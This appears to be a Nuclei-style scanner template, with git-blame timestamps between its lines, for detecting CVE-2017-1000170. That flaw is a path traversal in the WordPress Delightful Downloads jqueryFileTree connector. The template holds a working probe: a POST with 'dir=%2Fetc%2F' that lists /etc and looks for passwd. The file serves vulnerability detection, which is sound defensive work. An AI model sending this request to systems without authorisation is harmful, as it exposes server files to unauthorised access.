2021-03-23 12:56:42 +00:00
id : CVE-2017-1000170
info :
2022-06-09 20:35:21 +00:00
name : WordPress Delightful Downloads Jquery File Tree 2.1.5 - Local File Inclusion
2021-03-23 12:56:42 +00:00
author : dwisiswant0
severity : high
2022-06-09 20:35:21 +00:00
description : WordPress Delightful Downloads Jquery File Tree versions 2.1.5 and older are susceptible to local file inclusion vulnerabilities via jqueryFileTree.
2022-04-22 10:38:41 +00:00
reference :
- https://www.exploit-db.com/exploits/49693
2022-05-17 09:18:12 +00:00
- https://github.com/jqueryfiletree/jqueryfiletree/issues/66
- http://packetstormsecurity.com/files/161900/WordPress-Delightful-Downloads-Jquery-File-Tree-1.6.6-Path-Traversal.html
2022-06-09 20:35:21 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2017-1000170
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2017-1000170
cwe-id : CWE-22
2022-04-22 10:38:41 +00:00
tags : cve,cve2017,wordpress,wp-plugin,lfi,jquery
2021-03-23 12:56:42 +00:00
requests :
- method : POST
path :
- "{{BaseURL}}/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php"
body : "dir=%2Fetc%2F&onlyFiles=true"
matchers-condition : and
matchers :
- type : word
words :
- "<li class='file ext_passwd'>"
2021-03-23 12:56:56 +00:00
- "<a rel='/passwd'>passwd</a></li>"
2021-03-23 12:56:42 +00:00
condition : and
part : body
- type : status
status :
2022-01-04 19:34:16 +00:00
- 200
2022-06-09 20:35:21 +00:00
# Enhanced by mp on 2022/06/09